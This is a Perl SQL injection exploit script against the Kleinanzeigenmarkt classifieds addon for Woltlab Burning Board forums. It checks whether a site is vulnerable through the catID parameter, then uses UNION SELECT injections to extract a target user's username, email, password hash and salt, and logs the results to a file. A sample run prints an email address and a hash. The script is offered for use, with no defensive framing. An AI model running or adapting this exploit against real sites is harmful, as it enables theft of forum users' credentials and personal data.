#!/usr/bin/perl -w
############################################################################
#
# Woltlab Burningboard Addon Kleinanzeigenmarkt SQL Injection Exploit
# Exploit by fred777 (full np stuff <3)
#
# Greez to all teh l33t sh1t like :
# * Core.am
# * Back2hack.cc
# * Free-hack.com
# * fred777.de
# 
# Usage: exploit.pl <page> <userid>
# Example: perl exploit.pl http://seite.de 1
#
###########################################################################
#
# Demonstration:
#
# perl exploit.pl http://seite.de 1
# ...
# >-------Exploit Intro-------<
# -----------------------------
# Logging:
# -----------------------------
# [*] Vulnerable: Yes
# [*] Injecting..
# [*] -----------
# [*] Prefix: wcf1_
# [*] mySQL Version: 5.0
# [*] -----------
# [*] Userid: 1
# [*] Username: fred777
# [*] Email: nebelfrost77@googlemail.com
# [*] Hash: fc4520d254498762e8c576917ee452dbebd83367
# [*] Salt: ab520eaa88d03b1d3440277c8fba78bfb1994af2
# [*] Exit
#
#
############################################################################
# Setting crappy vars
    use LWP::Simple;
    if (!$ARGV[1]) {&intro; exit;}
    my $link = shift;
    my $userid = shift;
    my $add = '/index.php?page=AnnounceShow&catID=';
    
    &intro();
    print "\nLOGGING:\n----------------------------------------\n";
    
#*********** Vulnerable-Check ************#
    $resp = get($link.$add."'");
    if($resp =~ m/Fatal Error/i) {
        print "[*] Vulnerable: Yes\n[*] Injecting..\n[*] --------------\n";
    }
    elsif($resp =~ m/SecuritySystem/i) {print "[*] Blocked by SecuritySystem\n[*] Exit\n\n"; exit;}
    elsif($resp =~ m/id="errorMessage">/i) {print "[*] You must be a member\n[*] Exit\n\n"; exit;}    
    else { print "[*] Vulnerable: No\n[*] Exit"; exit;}
    
#************* Prefix Check ***************#
    $resp =~ m/AS wieviele FROM (.*_)attachment/i;
    $prefix = $1;
    print "[*] Prefix: ".$prefix."\n";
    
#*********** Injecting Nanobots ***********#
    $infostring = 'concat_ws(0x3a,999999,version(),username,email,password)';
    $resp2 = get($link.$add."1+and+1=0+GROUP+BY+b.messageID)+union+(select+1,1,1,".$infostring.",1"x38 ."+from+".$prefix."user+where+userid=".$userid.")--");
    $resp2 =~ m/999999:(.*)<\/a>/i;
    
#*********** Converting and printing ******#
    @data = split(":",$1);
    print "[*] mySQL Version: ".substr($data[0],0,3)."\n[*] --------------\n";
    print "[*] Userid: ".$userid."\n[*] Username: ".$data[1]."\n[*] Email: ".$data[2]."\n";
    print "[*] Hash: ".$data[3]."\n";

#************* Salt Check ***************#
    print "[*] Salt: ";
    $resp3 = get($link.$add."1+and+1=0+GROUP+BY+b.messageID)+union+(select+1,1,1,concat(999999,0x3a,salt)".",1"x38 ."+from+".$prefix."user+where+userid=".$userid.")--");
    if($resp3 =~ m/Fatal Error/i) {print "Keinen\n\n\n"; exit;}
    $resp3 =~ m/999999:(.*)<\/a>/i;
    $salt = $1;
    print $salt;

#*********** Write2file *****************#
    $text = "[fred777] WBB Kleinanzeigenmarkt Exploit:\n\n[*] Link: ".$link.$add."\n".
            "[*] Prefix: ".$prefix."\n[*] mySQL Version: ".$data[0]."\n[*] Userid: ".$userid."\n".
            "[*] Username: ".$data[1]."\n[*] Email: ".$data[2]."\n[*] Hash: ".$data[3]."\n[*] Salt: ".$salt."\n\n\n";
    open(LULZ,">>log.txt");
    print LULZ $text;
    close LULZ;
    print "\n[*] Writing Logfile";
    print "\n[*] Exit\n\n\n";
    
sub intro {
print q {

---------------------------------------
***************************************
*
*  [WBB] Kleinanzeigenmarkt Exploit
*         written by fred777
*           -----------
*   Usage: exploit.pl <url> <userid> 
*
***************************************
---------------------------------------
};



}